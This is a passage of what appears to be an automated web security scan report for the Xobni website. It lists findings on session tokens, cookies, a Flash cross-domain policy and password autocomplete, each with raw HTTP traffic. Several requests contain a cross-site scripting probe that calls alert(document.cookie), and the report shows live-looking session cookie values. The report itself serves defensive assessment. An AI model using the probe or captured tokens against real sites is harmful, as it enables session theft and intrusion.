Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/press/coverage

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.crn.com/software/221800211;jsessionid=T0WQC1YJMU5QVQE1GHOSKHWATMY32JVN

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /press/coverage HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 178670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<p><a href="http://www.crn.com/software/221800211;jsessionid=T0WQC1YJMU5QVQE1GHOSKHWATMY32JVN" target="_blank">
                   <strong>
...[SNIP]...

5. Flash cross-domain policy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xobni.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:12:41 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 18:49:14 GMT
ETag: "3b03bf-d4-477175e20be80"
Accept-Ranges: bytes
Content-Length: 212
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.xobniqa.com"/>
<allow-access-from domain="*.xobni.com"/>
<allow-access-from domain="10.23.23.*"/>
</cross-doma
...[SNIP]...

6. Cookie scoped to parent domain previous next
There are 7 instances of this issue:

/support/troubleshooter.php
/
/download
/download/
/download/12341
/download/latest
/lp/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

6.1. http://www.xobni.com/support/troubleshooter.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/support/troubleshooter.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/troubleshooter.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Length: 3952
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<TITLE>Troubleshooter</TITLE>
<style type="text/css">

.rounded-tr {
position:absolute;top:0px;right:0px;
}
.round
...[SNIP]...

6.2. http://www.xobni.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.1.10.1292288423

Response

6.3. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...

6.4. http://www.xobni.com/download/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...

6.5. http://www.xobni.com/download/12341 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/12341

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...

6.6. http://www.xobni.com/download/latest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/latest

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Download Xobni, t
...[SNIP]...

6.7. http://www.xobni.com/lp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/lp/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

7. Cookie without HttpOnly flag set previous next
There are 8 instances of this issue:

/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
/support/troubleshooter.php
/
/download
/download/
/download/12341
/download/latest
/lp/

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

7.1. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=56318370.535260956.1292274982.1292274982.1292274982.1

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:01:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 7805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
<meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
<TITLE>Page Not Found</T
...[SNIP]...

7.2. http://www.xobni.com/support/troubleshooter.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/support/troubleshooter.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.3. http://www.xobni.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.4. http://www.xobni.com/download previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

7.5. http://www.xobni.com/download/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

7.6. http://www.xobni.com/download/12341 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/12341

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.7. http://www.xobni.com/download/latest previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/download/latest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.8. http://www.xobni.com/lp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/lp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8. Password field with autocomplete enabled previous next
There are 4 instances of this issue:

/account/
/account/
/fr-fr/account/
/fr-fr/account/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

8.1. http://www.xobni.com/account/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/

Issue detail

The page contains a form with the following action URL:

https://www.xobni.com/account/

The form contains the following password field with autocomplete enabled:

password

Request

GET /account/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.7.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_login">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="loginattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20"></td>
...[SNIP]...

8.2. http://www.xobni.com/account/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/account/

Issue detail

The page contains a form with the following action URL:

https://www.xobni.com/account/

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_signup" style="border-left:1px solid #ddd;padding-left:20px;">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="createattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...
<td align="left"><input name="password_confirm" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...

8.3. http://www.xobni.com/fr-fr/account/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/account/

Issue detail

The page contains a form with the following action URL:

https://www.xobni.com/account/

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

GET /fr-fr/account/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_signup" style="border-left:1px solid #ddd;padding-left:20px;">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="createattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...
<td align="left"><input name="password_confirm" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...

8.4. http://www.xobni.com/fr-fr/account/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/fr-fr/account/

Issue detail

The page contains a form with the following action URL:

https://www.xobni.com/account/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_login">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="loginattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20"></td>
...[SNIP]...

9. Referer-dependent response previous next
There are 10 instances of this issue:

/enterprise/contact
/fr-fr/account.
/fr-fr/legal/privacy.
/fr-fr/legal/tos.
/homepage/productmenu/free
/homepage/productmenu/mobilebb
/homepage/productmenu/plus
/homepage/productmenu/xobnione
/learnmore/mobile/buynow
/learnmore/mobile/trial

Issue description

